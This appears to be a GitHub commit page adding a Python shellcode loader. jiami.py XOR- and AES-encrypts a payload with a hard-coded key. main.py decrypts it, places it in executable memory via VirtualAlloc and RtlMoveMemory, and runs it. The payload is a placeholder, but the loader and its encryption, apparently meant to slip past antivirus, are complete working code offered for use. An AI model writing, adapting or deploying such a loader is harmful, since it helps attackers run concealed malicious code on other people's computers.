Skip to content

Commit adb427c

Browse files
HZzz2HZzz2
committed
first commit
1 parent 6d7416e commit adb427c

File tree

3 files changed

+76
-0
lines changed

3 files changed

+76
-0
lines changed

jiami.py

Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
import base64
2+
from operator import xor
3+
from Crypto.Cipher import AES
4+
5+
def add_to_16(s):
6+
while len(s) % 16 != 0:
7+
s += '\0'
8+
return str.encode(s) # 返回bytes
9+
10+
def aes_jiami(text):
11+
# 密钥长度必须为16、24或32位,分别对应AES-128、AES-192和AES-256
12+
key = 'LeslieCheungKwok'
13+
aes = AES.new(add_to_16(key), AES.MODE_ECB)
14+
encrypted_text = str(base64.encodebytes(aes.encrypt(add_to_16(text))), encoding='utf8').replace('\n', '')
15+
return encrypted_text
16+
17+
def xor_jiami(s,key):
18+
xor_s = ''
19+
for i in s:
20+
xor_s += chr(ord(i) ^ key)
21+
return xor_s
22+
23+
24+
if __name__=='__main__':
25+
sc = 'payload'
26+
with open('./aes-xor.txt','w') as f:
27+
f.write(aes_jiami(xor_jiami(sc,35)))
28+
29+
30+
31+
32+

main.py

Lines changed: 44 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,44 @@
1+
import base64
2+
import ctypes
3+
4+
from Crypto.Cipher import AES
5+
6+
kernel32 = ctypes.windll.kernel32
7+
8+
def aes_jiemi(s):
9+
cipher = AES.new(b'LeslieCheungKwok', AES.MODE_ECB)
10+
return cipher.decrypt(base64.decodebytes(bytes(s, encoding='utf8'))).rstrip(b'\0').decode("utf8")
11+
12+
def xor_jiemi(s,key):
13+
xor_s = ''
14+
for i in s:
15+
xor_s += chr(ord(i) ^ key)
16+
return xor_s
17+
18+
def write_memory(buf):
19+
length = len(buf)
20+
21+
kernel32.VirtualAlloc.restype = ctypes.c_void_p
22+
ptr = kernel32.VirtualAlloc(None, length, 0x3000, 0x40)
23+
24+
kernel32.RtlMoveMemory.argtypes = (
25+
ctypes.c_void_p,
26+
ctypes.c_void_p,
27+
ctypes.c_size_t)
28+
kernel32.RtlMoveMemory(ptr, buf, length)
29+
return ptr
30+
31+
32+
def run(shellcode):
33+
buf = ctypes.create_string_buffer(shellcode)
34+
ptr = write_memory(buf)
35+
shell_func = ctypes.cast(ptr, ctypes.CFUNCTYPE(None))
36+
shell_func()
37+
38+
39+
40+
if __name__ == '__main__':
41+
jiami_sc = 'payload'
42+
sc = xor_jiemi(aes_jiemi(jiami_sc),35)
43+
shde = base64.b64decode(sc)
44+
run(shde)

setting.ico

66.1 KB
Binary file not shown.

0 commit comments

Comments
 (0)